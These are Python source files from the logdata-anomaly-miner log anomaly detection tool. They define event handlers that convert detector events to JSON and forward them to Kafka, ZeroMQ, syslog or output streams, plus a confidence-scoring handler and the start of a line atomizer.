Component not implementing this interface may still emit events without support for callbacks. """ @abc.abstractmethod def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws NotImplementedError if this source does not support allowlisting per se @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ @staticmethod def get_weight_analysis_field_path(): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" return [] @staticmethod def get_weight_output_field_path(): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" return [] JsonConverterHandler.py000066400000000000000000000204131500476301700351010ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that converts an event to JSON. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import json import time import copy import logging from aminer.events.EventInterfaces import EventHandlerInterface from aminer.AminerConfig import DEBUG_LOG_NAME, ENCODING, KEY_LOG_LINE_IDENTIFIER, KEY_AMINER_ID class JsonConverterHandler(EventHandlerInterface): """This class implements an event record listener, that will convert event data to JSON format.""" def __init__(self, json_event_handlers, analysis_context, pretty_print=True): """Initialize the event handler. @param json_event_handlers the event handlers to which the json converted data is sent. @param analysis_context the analysis context used to get the component. @param pretty_print if true, the json is printed pretty; otherwise the json is printed with less space needed. """ if not isinstance(json_event_handlers, list) or any(not isinstance(x, EventHandlerInterface) for x in json_event_handlers): msg = "json_event_handlers must be a list of event handlers implementing the EventHandlerInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not json_event_handlers: msg = "json_event_handlers must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(json_event_handlers, list) or any(not isinstance(x, EventHandlerInterface) for x in json_event_handlers): msg = "json_event_handlers must be a list of event handlers implementing the EventHandlerInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.json_event_handlers = json_event_handlers self.analysis_context = analysis_context if not isinstance(pretty_print, bool): msg = "pretty_print must be a boolean value." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.pretty_print = pretty_print def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. 
This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True if "StatusInfo" in event_data: # No anomaly; do nothing on purpose pass else: log_data = {} try: data = log_atom.raw_data.decode(ENCODING) except UnicodeError: data = repr(log_atom.raw_data) log_data["RawLogData"] = [data] if log_atom.get_timestamp() is None: log_atom.set_timestamp(time.time()) log_data["Timestamps"] = [round(log_atom.atom_time, 2)] log_data["DetectionTimestamp"] = round(time.time(), 2) log_data["LogLinesCount"] = len(sorted_loglines) if log_atom.parser_match is not None and hasattr(event_source, "output_logline") and event_source.output_logline: log_data["AnnotatedMatchElement"] = {} for path, match in log_atom.parser_match.get_match_dictionary().items(): if isinstance(match, list): for match_element_id, match_element in enumerate(match): if isinstance(match_element.match_object, bytes): log_data["AnnotatedMatchElement"][path + "/" + str(match_element_id)] = match_element.match_object.decode( ENCODING) else: log_data["AnnotatedMatchElement"][path + "/" + str(match_element_id)] = 
str(match_element.match_object) elif isinstance(match.match_object, bytes): log_data["AnnotatedMatchElement"][path] = match.match_object.decode(ENCODING) else: log_data["AnnotatedMatchElement"][path] = str(match.match_object) analysis_component = {"AnalysisComponentIdentifier": self.analysis_context.get_id_by_component(event_source)} if event_source.__class__.__name__ == "ExtractedData_class": analysis_component["AnalysisComponentType"] = "DistributionDetector" else: analysis_component["AnalysisComponentType"] = str(event_source.__class__.__name__) analysis_component["AnalysisComponentName"] = self.analysis_context.get_name_by_component(event_source) analysis_component["Message"] = event_message if hasattr(event_source, "persistence_id"): analysis_component["PersistenceFileName"] = event_source.persistence_id if hasattr(event_source, "learn_mode"): analysis_component["TrainingMode"] = event_source.learn_mode detector_analysis_component = event_data.get("AnalysisComponent") if detector_analysis_component is not None: for key in detector_analysis_component: if key in analysis_component: continue analysis_component[key] = detector_analysis_component.get(key) log_resource = log_atom.source.resource_name if log_resource is not None: analysis_component["LogResource"] = log_resource.decode() if "LogData" not in event_data: if self.analysis_context.aminer_config.config_properties.get(KEY_LOG_LINE_IDENTIFIER): event_data["LogLineIdentifier"] = log_atom.log_line_identifier event_data["LogData"] = log_data event_data["AnalysisComponent"] = analysis_component aminer_id = self.analysis_context.aminer_config.config_properties.get(KEY_AMINER_ID) if aminer_id is not None: event_data["AminerId"] = aminer_id if self.pretty_print is True: json_data = json.dumps(event_data, indent=2) else: json_data = json.dumps(event_data) res = [""] * len(sorted_loglines) res[0] = str(json_data) for listener in self.json_event_handlers: if hasattr(event_source, "output_event_handlers") and 
event_source.output_event_handlers is not None \ and listener not in event_source.output_event_handlers: event_source = copy.copy(event_source) event_source.output_event_handlers.append(listener) listener.receive_event(event_type, None, res, json_data, log_atom, event_source) return True KafkaEventHandler.py000066400000000000000000000112021500476301700343130ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that forwards Json-objects to Kafka. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface class KafkaEventHandler(EventHandlerInterface): """This class implements an event record listener, that will forward Json- objects to a Kafka queue.""" def __init__(self, analysis_context, topic, options): """Initialize the event handler. @param analysis_context the analysis context used to get the component. @param topic the Kafka topic to which the data is sent. @param options Kafka specific options. """ self.analysis_context = analysis_context self.options = options if not isinstance(options, dict) or any(not isinstance(x, str) for x in options.keys()): msg = "options has to be a dictionary with string keys." 
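logging.getLogger(DEBUG_LOG_NAME).error(msg)
raise TypeError(msg)
# (tail of KafkaEventHandler.__init__: the method header and the options validation, whose error branch the two
#  statements above belong to, precede this span)
if not isinstance(topic, str):
    msg = "topic has to be of the type string."
    logging.getLogger(DEBUG_LOG_NAME).error(msg)
    raise TypeError(msg)
if topic is not None and len(topic) == 0:
    msg = "topic must not be empty."
    logging.getLogger(DEBUG_LOG_NAME).error(msg)
    raise ValueError(msg)
self.topic = topic
# The kafka module is imported and the producer created lazily in receive_event, not here.
self.producer = None
self.kafka_imported = False


def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source):
    """
    Receive information about a detected event in json format and forward it to the configured Kafka topic.

    @param _event_type is a string with the event type class this event belongs to. This information can be used to
           interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be
           used to create generic log messages.
    @param _event_message the first output line of the event.
    @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as available
           to the time of the event. The list has to contain at least one line.
    @param event_data type-specific event data object; this handler only accepts str or bytes (e.g. the output of the
           JsonConverterHandler) and rejects everything else.
    @param _log_atom the log atom which produced the event.
    @param event_source reference to detector generating the event.
    @return True if the event was forwarded, or skipped because this handler is not in the detector's
            output_event_handlers or the detector is suppressed; False if the kafka module is missing, event_data has
            the wrong type, or creating the producer / sending failed.
    """
    if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None \
            and self not in event_source.output_event_handlers:
        return True
    component_name = self.analysis_context.get_name_by_component(event_source)
    if component_name in self.analysis_context.suppress_detector_list:
        return True
    # Reject unsupported payloads before touching the producer, so bad data has no side effects.
    if not isinstance(event_data, (str, bytes)):
        msg = "KafkaEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first."
        logging.getLogger(DEBUG_LOG_NAME).warning(msg)
        print("WARNING: " + msg, file=sys.stderr)
        return False
    # Import on every call (a sys.modules lookup after the first one) so that KafkaError is bound in this scope for the
    # except clauses below; importing it only on the first call left the name unbound on every later call, turning a
    # send failure into an UnboundLocalError.
    try:
        from kafka import KafkaProducer
        from kafka.errors import KafkaError
    except ImportError:
        msg = "Kafka module not found."
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        print("ERROR: " + msg, file=sys.stderr)
        return False
    self.kafka_imported = True
    if self.producer is None:
        # First event, or the previous producer was closed after a failed send: (re)create it instead of calling
        # send() on None.
        try:
            self.producer = KafkaProducer(
                **self.options,
                # bytes payloads are passed through unchanged; calling encode() on them raised AttributeError
                value_serializer=lambda v: v if isinstance(v, bytes) else v.encode())
        except KafkaError as err:
            msg = str(err)
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            print("Error: " + msg, file=sys.stderr)
            self.producer = None
            return False
    try:
        self.producer.send(self.topic, event_data)
    except KafkaError as err:
        msg = str(err)
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        print("Error: " + msg, file=sys.stderr)
        # Drop the broken producer; the next event recreates it.
        self.producer.close()
        self.producer = None
        return False
    return True


# ScoringEventHandler.py000066400000000000000000000164031500476301700347120ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events
"""This module defines an event handler that adds a confidence score to the anomaly output.

The score is calculated through analysis of a list of strings defined in the detector through the function
get_weight_analysis_field_path and weights the single strings based on the weights dictionary. The weights can optionally
be automatically calculated.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .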
""" import copy import logging from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventInterfaces import EventSourceInterface from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext class ScoringEventHandler(EventHandlerInterface): """This class implements an event record listener, that will add a confidence score to the anomaly output.""" def __init__(self, event_handlers, analysis_context, weights=None, auto_weights=False, auto_weights_history_length=1000): """ Initialize the ScoringEventHandler component. @param weights A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list and the corresponding values are the assigned weights. Strings that are not present in this dictionary have the weight 0.5 if not automatically weighted. @param auto_weights boolean value that states if the weights should be automatically calculated through the formula 10 / (10 + number of value appearances). @param auto_weights_history_length integer value that specifies the number of values that are considered in the calculation of the weights. """ if not event_handlers: msg = "event_handlers must not be empty or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(event_handlers, list) or any(not isinstance(x, EventHandlerInterface) for x in event_handlers): msg = "event_handlers must be a list of EventHandlerInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(analysis_context, AnalysisContext): msg = "analysis_child must be of type AnalysisChild." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if weights is not None and (not isinstance(weights, dict) or any(not isinstance(x, (int, float)) for x in list(weights.values()))): msg = "weights must be a dictionary with numerical values." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(auto_weights, bool): msg = "auto_weights must be of type boolean." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(auto_weights_history_length, bool) or not isinstance(auto_weights_history_length, int): msg = "auto_weights must be of type boolean." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if auto_weights_history_length < 1: msg = "auto_weights must be greater than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.analysis_context = analysis_context self.event_handlers = event_handlers self.weights = weights self.auto_weights = auto_weights self.auto_weights_history_length = auto_weights_history_length if self.auto_weights: self.history_list = [[] for _ in range(self.auto_weights_history_length)] self.history_list_index = 0 def receive_event(self, event_type, event_message, sorted_log_lines, event_data, log_atom, event_source): """Receive information about a detected event.""" path_valid = True if isinstance(event_source, EventSourceInterface): analysis_field_path = event_source.get_weight_analysis_field_path() output_field_path = event_source.get_weight_output_field_path() else: analysis_field_path = [] output_field_path = [] if not analysis_field_path: path_valid = False else: analysis_list = event_data for path in analysis_field_path: if path in analysis_list: analysis_list = analysis_list[path] else: path_valid = False break # Calculate and add the confidence to the output if the path is valid if path_valid: event_data_confidence = event_data for path in output_field_path[:-1]: if path not in event_data_confidence: event_data_confidence[path] = {} event_data_confidence = event_data_confidence[path] # Calculate the absolute confidence confidence_absolut = sum(self.get_weight(val) for val in analysis_list) # Add the absolute and mean confidence to the message 
event_data_confidence[output_field_path[-1]] = {'confidence_absolut': confidence_absolut, 'confidence_mean': confidence_absolut / len(analysis_list)} # Update the history list and increase the count index if self.auto_weights: self.history_list[self.history_list_index] = analysis_list self.history_list_index += 1 if self.history_list_index >= self.auto_weights_history_length: self.history_list_index %= self.auto_weights_history_length # Send the message to the following event handlers for listener in self.event_handlers: if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None \ and listener not in event_source.output_event_handlers: event_source = copy.copy(event_source) event_source.output_event_handlers.append(listener) listener.receive_event(event_type, event_message, sorted_log_lines, event_data, log_atom, event_source) def get_weight(self, value): """Return the weight of the value parameter.""" if self.weights is not None and value in self.weights: # Return the specified weight if the value is in the weight list return self.weights[value] if not self.auto_weights: # Return 0.5 if the value is not in the weight list and the weights are not automatically calculated return 0.5 # Else calculate the weight through 10 / (10 + number of value appearances) return 10 / (10 + sum(value in value_list for value_list in self.history_list)) StreamPrinterEventHandler.py000066400000000000000000000065421500476301700361100ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that prints data to a stream. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import io import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventData import EventData class StreamPrinterEventHandler(EventHandlerInterface): """This class implements an event record listener, that will just print out data about the event to a stream. By default this is stdout. """ def __init__(self, analysis_context, stream=sys.stdout): """Initialize the event handler. @param analysis_context the analysis context used to get the component. @param stream the output stream of the event handler. """ self.analysis_context = analysis_context if not isinstance(stream, io.IOBase): msg = "The stream variable has to be a stream." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.stream = stream def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. 
@param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True event_data_obj = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source, self.analysis_context) message = f"{event_data_obj.receive_event_string()}\n" if hasattr(self.stream, "buffer"): self.stream.buffer.write(message.encode()) else: self.stream.write(message) self.stream.flush() return True SyslogWriterEventHandler.py000066400000000000000000000115371500476301700357660ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that prints data to a local syslog instance. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import io import os import syslog import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler class SyslogWriterEventHandler(EventHandlerInterface): """This class implements an event record listener to forward events to the local syslog instance. 
CAVEAT: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and probably fill up your disks. """ def __init__(self, analysis_context, instance_name="aminer"): """Initialize the event handler. @param analysis_context the analysis context used to get the component. @param instance_name the process name shown in the syslog. """ self.analysis_context = analysis_context if not isinstance(instance_name, str): msg = "instance_name has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if instance_name is not None and len(instance_name) == 0: msg = "instance_name must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.instanceName = instance_name syslog.openlog(f"{self.instanceName}[{os.getpid()}]", syslog.LOG_INFO, syslog.LOG_DAEMON) syslog.syslog(syslog.LOG_INFO, "Syslog logger initialized") self.buffer_stream = io.StringIO() self.event_writer = StreamPrinterEventHandler(analysis_context, self.buffer_stream) self.event_id = 0 def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected even and forward it to syslog. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. 
""" if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True elif hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self in \ event_source.output_event_handlers and self.event_writer not in event_source.output_event_handlers: event_source.output_event_handlers.append(self.event_writer) component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True self.buffer_stream.seek(0) self.buffer_stream.truncate(0) self.event_writer.receive_event(event_type, event_message, sorted_loglines, event_data, log_atom, event_source) event_data = self.buffer_stream.getvalue() current_event_id = self.event_id self.event_id += 1 serial = 0 for data_line in event_data.strip().split('\n'): # Python syslog is very ugly if lines are too long, so break them down. while data_line: if serial == 0: message = f"[{current_event_id}] {data_line[:800]}" else: message = f"[{current_event_id}-{serial}] {data_line[:800]}" data_line = data_line[800:] syslog.syslog(syslog.LOG_INFO, message) serial += 1 return True logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events/Utils.py000066400000000000000000000050341500476301700321630ustar00rootroot00000000000000"""This module defines a handler for storing event history. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.events.EventInterfaces import EventHandlerInterface from aminer.util.History import LogarithmicBackoffHistory class VolatileLogarithmicBackoffEventHistory(EventHandlerInterface, LogarithmicBackoffHistory): """This class is a volatile filter to keep a history of received events. Example usages are for analysis by other components or for external access via remote control interface. """ def __init__(self, max_items): """Initialize the history component. @param max_items the maximum number of items in the event history. """ LogarithmicBackoffHistory.__init__(self, max_items) self.event_id = 0 def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event and store all related data as tuple to the history log. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. 
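"""
        self.add_object((self.event_id, event_type, event_message, sorted_loglines, event_data, log_atom, event_source))
        self.event_id += 1
        return True
ZmqEventHandler.py000066400000000000000000000116521500476301700340560ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events
"""This module defines an event handler that forwards anomalies to ZeroMQ.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import sys
import logging
import zmq
import time
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.events.EventInterfaces import EventHandlerInterface


class ZmqEventHandler(EventHandlerInterface):
    """Event record listener that forwards serialized (JSON) event data to a ZeroMQ PUB socket.

    The handler only forwards str/bytes event data; structured event data has to be serialized first
    (see the warning emitted in receive_event). Every message is optionally prefixed by a topic frame.

    Security note: this handler configures no ZeroMQ authentication or encryption. Whoever can reach the
    bound endpoint can subscribe to the full anomaly stream, so the endpoint (see the url parameter of
    __init__) should live where filesystem or network permissions restrict it to intended consumers.
    """

    def __init__(self, analysis_context, topic=None, url="ipc:///tmp/aminer"):
        """Initialize the event handler and bind the PUB socket.

        @param analysis_context the analysis context used to look up the component name of the event source and the
               suppress_detector_list.
        @param topic optional topic string sent as a separate first frame (zmq.SNDMORE) before each event; None or an
               unset topic disables the topic frame. Empty strings are rejected.
        @param url the ZeroMQ endpoint the producer socket binds to (str or bytes, not empty). The default points to an
               IPC path below /tmp, a directory writable by every local user; deployments that must restrict who may
               read the anomaly feed should use a path in a directory with appropriate permissions instead.
        @raise TypeError if url is not str/bytes or topic is set but not a str.
        @raise ValueError if url or topic is empty.
        """
        if not isinstance(url, (str, bytes)):
            msg = "url has to be of the type string or bytes."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # url can no longer be None here (rejected above), so only emptiness remains to be checked.
        if len(url) == 0:
            msg = "url must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # topic is optional: receive_event skips the topic frame when it is falsy, so None must be accepted here.
        # Rejecting None unconditionally made the documented default unusable.
        if topic is not None and not isinstance(topic, str):
            msg = "topic has to be of the type string."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if topic is not None and len(topic) == 0:
            msg = "topic must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.analysis_context = analysis_context
        self.url = url
        self.topic = topic
        self.context = zmq.Context()
        self.producer = self.context.socket(zmq.PUB)
        self.producer.bind(self.url)
        # Pause briefly after binding; presumably to give subscribers time to connect before the first event is
        # published (PUB sockets drop messages that have no subscriber yet) -- confirm against the original intent.
        time.sleep(1)
        logging.getLogger(DEBUG_LOG_NAME).info("ZmqEventHandler initialized")

    def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source):
        """Receive information about a detected event and publish it on the ZeroMQ socket.

        @param _event_type is a string with the event type class this event belongs to. This information can be used to
               interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be
               used to create generic log messages.
        @param _event_message the first output line of the event.
        @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as
               available to the time of the event. The list has to contain at least one line.
        @param event_data type-specific event data object; has to be str or bytes here (e.g. produced by the
               JsonConverterHandler), anything else is refused with a warning.
        @param _log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        @return True when the event was published or deliberately skipped (handler not selected by the source, or source in
                the suppress list); False when event_data had the wrong type, the socket is closed, or sending failed.
        """
        # Respect a detector's explicit output handler selection, if it has one.
        if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \
                event_source.output_event_handlers:
            return True
        component_name = self.analysis_context.get_name_by_component(event_source)
        if component_name in self.analysis_context.suppress_detector_list:
            return True
        if not isinstance(event_data, (str, bytes)):
            msg = "ZmqEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first."
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            print("WARNING: " + msg, file=sys.stderr)
            return False
        if self.producer is None:
            # The socket was closed after an earlier ZMQError; nothing can be sent until the handler is recreated.
            return False
        # Terminate every record with a newline so consumers can split concatenated output.
        if isinstance(event_data, str):
            event_data += "\n"
        else:
            event_data += b"\n"
        try:
            if self.topic:
                self.producer.send_string(self.topic, flags=zmq.SNDMORE)
            # please note that if the JsonConvertHandler was used(json: true)
            # then it is possible to use the socket.recv_json() for the
            # consumer. recv_json() will decode the json-string
            if isinstance(event_data, bytes):
                # send_string() only accepts str; bytes have to go through the raw send().
                self.producer.send(event_data)
            else:
                self.producer.send_string(event_data)
        except zmq.ZMQError as err:
            msg = str(err)
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            print("Error: " + msg, file=sys.stderr)
            self.producer.close()
            self.producer = None
            return False
        return True
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input/000077500000000000000000000000001500476301700303425ustar00rootroot00000000000000ByteStreamLineAtomizer.py000066400000000000000000000342621500476301700352460ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input
"""This module provides support for splitting a data stream into atoms, perform parsing and forward the results.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .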
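"""
import logging
import sys
import time
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.input.LogAtom import LogAtom
from aminer.input.InputInterfaces import StreamAtomizer, AtomHandlerInterface
from aminer.input.JsonStateMachine import json_machine
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.ModelElementInterface import ModelElementInterface
from aminer.events.EventInterfaces import EventHandlerInterface

# Module-level state shared by found_json() and ByteStreamLineAtomizer.consume_data(). It is shared by ALL atomizer
# instances in the process, so concurrent use of several JSON atomizers from different threads is not safe.
breakout = False
data = None
line = None


def found_json(_data):
    """Callback for the JsonStateMachine: record that a complete JSON document was seen and keep its data.

    @param _data the decoded JSON object handed over by the state machine.
    """
    global breakout
    breakout = True
    global data
    data = _data


class ByteStreamLineAtomizer(StreamAtomizer):
    """Atomizer that consumes binary data from a stream and breaks it into lines, removing the line separator at the end.

    With a parsing model, it will also perform line parsing. Failures in atomizing or parsing will cause events to be
    generated and sent to event handler. Data will be consumed only when there was no downstream handler registered (the
    data will be discarded in that case) or when at least one downstream consumed the data.

    max_line_length bounds how much unterminated input is buffered before the line is reported as overlong and discarded,
    which keeps memory use bounded for streams that never deliver a separator.
    """

    COUNTER = 0

    def __init__(self, parsing_model, atom_handler_list, event_handler_list, max_line_length, default_timestamp_path_list,
                 eol_sep=b"\n", json_format=False, xml_format=False, use_real_time=False, resource_name=None,
                 continuous_timestamp_missing_warning=True):
        """Create the atomizer.

        @param parsing_model the ModelElementInterface used to parse each line.
        @param atom_handler_list None or a list of AtomHandlerInterface objects receiving the parsed atoms.
        @param event_handler_list when not None, send events to those handlers. The list might be empty at invocation and
               populated later on.
        @param max_line_length the maximal line length including the final line separator; must be a positive integer.
        @param default_timestamp_path_list list of parser paths tried in order to obtain the atom timestamp.
        @param eol_sep the (non-empty) byte sequence separating lines.
        @param json_format when True, lines are delimited by complete JSON documents instead of eol_sep.
        @param xml_format when True, the whole stream_data offered is treated as one atom. Mutually exclusive with json_format.
        @param use_real_time when True, atoms without a parsed timestamp get the current wall-clock time.
        @param resource_name optional name (str or bytes) of the underlying resource.
        @param continuous_timestamp_missing_warning when False, the "no timestamp" warning is printed only once.
        @raise TypeError on a parameter of the wrong type.
        @raise ValueError on a non-positive max_line_length, an empty eol_sep, or json_format together with xml_format.
        """
        if not isinstance(parsing_model, ModelElementInterface):
            msg = "parsing_model must be of type ModelElementInterface!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.parsing_model = parsing_model
        if atom_handler_list is not None and (not isinstance(atom_handler_list, list) or not all(
                isinstance(x, AtomHandlerInterface) for x in atom_handler_list)):
            msg = "atom_handler_list must be None or a list of AtomHandlerInterface!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
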